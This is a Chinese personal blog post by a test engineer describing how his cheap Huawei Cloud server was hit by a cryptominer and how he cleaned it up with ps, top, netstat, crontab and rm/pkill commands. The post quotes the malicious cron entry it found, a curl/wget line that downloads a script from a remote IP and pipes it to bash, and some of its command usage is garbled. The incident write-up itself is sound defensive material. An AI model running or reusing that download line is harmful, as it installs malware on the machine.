华为云服务器,被植入挖矿机病毒
Linux 主机基本配置
这是我自己的廉价服务器,采用单核CUP,内存2G,LNMP。反正就是几百块能用3年的那种,还是新用户~真香!
Linux 挖矿机病毒
反正就不是什么好东西,百度上翻翻都用有很多,奇怪的是偏偏给我遇上了,就连我单核的cup也不放过。
Linux 中毒的一般表现有哪些?
- CUP 100%
- 内存 100%
- 网站已经无法访问(报5XX)
- 华为云会发一条温馨提示的短信给你,大致说受到对外攻击,会暂时封掉你的公网ip
当收到短信的那一刻,我还没有放在眼内,因为我在上班,到了中午的时候认真看了短信,对外攻击,是他打我,还是我打他,哈哈。
然后登陆我网站,发现进不去了,去后台重启了一下,看到下面的图图
Linux 中毒后的后台情况
真是红红火火,我tm以为我网站怎么就突然火起来的呢~?重启后,后台可以进去,但非常缓慢,一开始我不知道什么回事,简单kill掉几个进程,瞄了一眼,感觉没事又去上班了。
到了晚上,我登录网站,还是tm的报500,i 服了 you!
感觉自己也是太优秀了,作为一个小小的测试,终于把自己一身的技能都用上了,下面说一下,我排查的情况。
Linux 中毒后系统排查
一开始我也以为测试工程师懂Linux有什么用处呢?
确实没有什么用处,日常公司,根本不关你事,特别是功能测试,但并不是没有用处,只是还没有用到的哪一天而已。
第一步:一开始的时候是怎么排查的呢?
起初真不知是中毒,中毒是我后面查百度的,第一步我是看云服务器改我指引,大概意思是先看看Linux下目前运行的进程是否有异常
ps -ef 是用标准的格式显示进程的、其格式如下
ps aux 是用BSD的格式来显示、其格式如下
ps -ef 是用标准的格式显示进程的、其格式如下,结果如下,感觉没有什么特别,应为平时没有关心正常是有什么东西在运行~~草率了
ps 用法 看这个:https://www.cnblogs.com/Diyo/p/11411038.html
上图中发现很多叫kworker 的名字,百度了一下跟挖矿病毒有关
第二步:通过线索顺藤摸瓜,谁在折磨我的CPU
baidu教会了我很多东西,同时也遇到很多同病相怜的朋友,惨遭挖矿机病毒折磨。
回想起,后台状态的图片CPU%,想起了top命令
top 实时显示系统中各个进程的资源占用状况
使用top命令后发现,一个PID:10744,占用CPU97%,叫做networker,搜索了一下也是这个词,也是和挖矿机有关的
根据networker,见名知意,跟网络有关,想到了netstat命令
netstat 持续输出网络信息
清晰看见除了本机ip外,还有一些国外ip如图:
64.68.187.115美国南达科他阿伯丁
89.8.135.48来自挪威
一些同样的关键字established也是有关系的
第三步:尝试恢复Linux正常状态
根据上面的查询的结果,知道一个PID:10744,最炸,先把他kill掉,但是过了一会又有一个,出来不停循环,pkill也不行。
kill -9 10744 强制杀掉进程
pkill 10744 杀进程树的那种
查看了相关教程后,原来这个鬼东西还有定时任务。。。
crontab -l 查看当前用户的定时任务
curl -fsSL http://185.239.242.71/ldr.sh || wget -q -0 - http://185.239.242.71/ldr.sh)|bash > /dev/null 2>&1
这个脚本可以看这里:https://help.aliyun.com/document_detail/196163.html
尝试将所有查找所有定时任务删掉
crontab -r 删除计划任务
ls -al | grep cron 查找有关的都删除了
rm -rf 名字 删除文件
挖矿机会产生很多垃圾,要删除缓存
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9 这个不行就逐个查杀删
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
pkill -f ririg
rm -rf /var/tmp/ntpd
pkill -f /var/tmp/ntpd
rm -rf /var/tmp/ntp
pkill -f /var/tmp/ntp
rm -rf /var/tmp/qq
rm -rf /var/tmp/qq1
pkill -f /var/tmp/qq
rm -rf /tmp/qq
rm -rf /tmp/qq1
pkill -f /tmp/qq
pkill -f /var/tmp/aa
rm -rf /var/tmp/aa
第四步:重启验证一下CPU和内存占用
服务器起来大概2分钟,top 看看有没有异常的东西
- 检查CPU、内存使用情况
- 网站访问是否正常
- 查看服务器后台,观察一段时间,没有异常就可以了
Linux清理病毒后需要做什么?
重置所有密码和安全策略
- 服务器密码,密码强度
- 服务器对于的安全,屏蔽不常用的端口
- 操作后台管理员密码,密码强度
- 操作后台设置特殊端口才能访问
提高安全意识
- 数据库自动备份
- 数据库不适用弱密码
- 开启监控和设置预警
总结
谢谢大家关心,目前我网站数据不受影响,可以正常访问,服务器也是恢复到正常稳定的状态。
留意云服务会对公网ip做冻结操作,随时准备提工单,说明情况恢复即可!
不能用弱密码,有条件的话,可以购买安全服务。
最后,继续相互学习,继续做一个卑微而强大的测试工程师吧!